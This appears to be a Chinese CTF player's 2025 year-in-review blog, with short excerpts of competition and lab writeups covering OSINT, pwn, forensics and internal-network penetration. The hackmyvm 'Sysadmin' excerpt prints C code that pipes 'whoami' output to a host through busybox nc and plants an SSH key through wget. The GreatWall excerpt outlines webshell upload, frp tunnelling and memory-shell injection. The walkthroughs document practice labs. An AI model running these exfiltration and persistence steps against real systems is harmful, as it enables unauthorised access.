2025年度总结
较今昔以观进退,对前后而察盈虚。
2024年度总结传送门
导语
又打了一年CTF,跟着校队或联队的大佬们拿了些奖,走过了不少城市,面基了好些师傅。
去年总结结语中的期望虽不敢说圆满完成,但也是完成了大半:)
这一年又学到了很多,也在慢慢走向实战,目前感觉CTF还是和实战有比较大的差距的()
在网安的道路上,我仍然只是初窥门径。仰之弥高,钻之弥坚。
接下来依旧按月份列一下这一年的历程吧
1月
西湖论剑初赛
wp: 点我
当时菜炸了,没能进决赛(
印象比较深的是这个比赛有个零解misc,CS流量分析出现了需要自己去手撕pem然后算RSA得到私钥的骚操作。当时愣是没想到会这样考(
RDCTF
wp: 点我
学弟Sean爷参与出题的比赛,欣然前往参与捧场 :)
当时打到了第一名,由于不是新生所以不能拿奖,但是免考拿了一张NISP一级证书(但是仍然要交钱,真***贵啊)
image-20251231163351246
美赛
跟着原来学院的学长打的,负责编程,由于基本什么都不懂所以纯属被带着跑orzorzorz
拿了个S奖((
...
CISCN2025 Writeup
时隔一年多又来打国赛了()
初赛Writeup点我
初赛还和期末考试冲突了,为了搞缓考材料给我跑似了((
依旧是和同届的几位神组的队,按名次来看应该是能进线下,希望这次能拿个好一点的成绩吧()
鹏城杯2025初赛 Writeup
仍然是只做了一点点misc,校队的师傅们还是tql,又被带进线下了orzorzorz
writeup点我
HSCCTF2025 Writeup
虽然是个小比赛,但是怀着去年因为差了一点没能拿到奖的执念今年又来打了((
第十名,极限拿奖()
不得不说现在AI太好用了()
OSINT
Lake
这哪是lake
Lake
找到一座一样的房子,在英国的滨海绍森德
image-20251205133616148
image-20251205133749814
image-20251205133810241
查到这个地方海拔差不多12左右
HSCCTF{51.5410, 0.6431,12}
Pwn
pwn1
64位ret2text
image-20251205142530688
image-20251205142545660
123456from pwn import *io=remote("150.138.81.18",13314)io.recvuntil(b"Enter your input: ")io.sendline(b'A'*72+p64(0x4011E ...
古剑山2025 初赛 Writeup
跟校队大手子们打的,又被带飞了,混进决赛了)orzorzorz
wp赛后一小时狂赶,比较草,直接贴这了(
Misc
水果
图片后藏压缩包
image-20251129121104368
看到提示oursecret,用oursecret对压缩包提取,猜测密码为shuiguo
image-20251129121437471
压缩包中的oursecret解出来刚好16行,所以应该是吧它当作字典,对flag.txt中的每一行去其中查找行号0-f,得到一个hex字符串,然后from
hex
12345678910111213141516171819202122232425262728293031323334# -*- coding: utf-8 -*-def main(): # 读取 OurSecret.txt 的所有行,去除末尾换行符 with open('OurSecret.txt', 'r', encoding='utf-8') as f: secret ...
龙信杯2025 部分writeup+复现
不会的还是太多了,根据网上佬们的wp好好复现一下吧
(又来吃百家饭了)
手机取证
1
分析手机镜像,请问机身的Wi-Fi
信号源的物理地址是什么?[标准格式:01:02:03:04:05:06]
在/misc/wifi/WifiConfigStore.xml中可找到
img
00:db:60:6e:86:13
2
分析手机镜像,请问张大的手机号码尾号是3807的手机号码是多少?[标准格式:15599005009]
全局搜索
img
15680193807
3
分析手机镜像,分析手机镜像,其通讯录中号码归属地最多的直辖市是哪里?[标准格式:天津市]
排个序不难发现明显北京市最多
img
北京市
4
分析手机镜像,嫌疑人最近卸载过的的一款小说APP的名字是什么?[标准格式:com.tencent.mm]
查看包的缓存/system/package_cache/1,找到有个com.kmxs.reader未在APP列表中出现
img
img
七猫免费小说
5
分析手机镜像,嫌 ...
数证杯2025 部分writeup+复现
又是拖队友后腿的一集,给磕了orzorzorz
现在根据网上有的一些答案复现一下吧,以及记录一些题我的做法,争取下次不再拖后腿了orzorzorz
由于至今不会逆向,“ APK程序分析 ”“
二进制程序分析”两部分就不复现了((
“数据分析”部分也不复现了,做这部分题全靠AI(
服务器取证
重建服务器集群
将四个镜像分别仿真起来,然后配到192.168.50.*的网段下
img
查看所有pod
img
访问kubernetes的dashboard
img
1kubectl create token dashboard-admin --namespace kube-system
获取到token,登录进去,看到pods是有问题的状态
img
去第四台机器上关一下防火墙
1systemctl stop firewalld
redis活了
img
master上有mysql80的配置文件,可从中得知存储目录叫mysql80
img
可以在第四台机器上通过暴力搜索mysq ...
0xGame2025 大而美 Official Writeup
先简述一下出题时的攻击流程
环境中共有三台机器:一台 Windows 10、一台 Windows 7 和一台 Windows
Server 2019,三者位于同一内网中。其中,Windows Server 2019
作为域控制器,部署了 Active Directory 域服务,并配置了域名
0xgaammee.com。Windows 7 计算机已加入该域,而 Windows 10
计算机未加入域。
Windows 10上通过phpstudy部署有存在漏洞的CraftCMS
web服务,黑客利用漏洞写入了木马控制了该机器,并获取到了用户名字典和密码字典。而后黑客搭建了frp,利用得到的字典对域进行了密码喷洒攻击。
附件中的1.E01即Windows 10的磁盘镜像,1.pcapng为密码喷洒时从Windows
7上抓取到的流量包。
有很多各种各样方便快捷的软件可用于磁盘取证,这里为了更好地理解原理,使用朴实无华的FTK
Manager工具。
1
被攻陷的机器中,用户0xGame的明文密码是?
在C:\Windows\System32\config下找 ...
hackmyvm Machines-Easy
Sysadmin
访问过去是个上传的页面,能够编译运行C语言源文件,查看网页源码注释里给出了编译用的命令
img
从命令中看出禁止了从外部链接库,所以要用system函数得自己定义一下。简单尝试后发现很多常用命令没有,但是有busybox用。先搞到当前用户名
12345int system(const char *command);int main() { system("echo $(whoami) | busybox nc 192.168.56.1 23333"); return 0;}
img
然后写公钥进去,在本地起个服务wget进去
12345int system(const char *command);int main() { system("mkdir -p ~/.ssh && touch ~/.ssh/authorized_keys && busybox wget 192.168.56.1:8000/id_rsa.pub ...
春秋云境-GreatWall
先扫一波,扫到一个nday
img
写马进去
img
蚁剑连上,拿到第一个flag
img
传fscan扫内网
img
搭建frp
img
img
前面扫到有一台机器有heapdump泄露,访问172.28.23.33:8080/actuator/heapdump下载下来,然后用JDumpSpider获取key
img
shiro attack写哥斯拉的内存马进去
img
哥斯拉连上,是一个低权限用户
img
先看下网络状态,看到在59696端口跑了个服务
img
切到/home/ops01底下,有个HashNote附件,看来是个pwn题。一点不懂pwn,直接抄作业
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071 ...







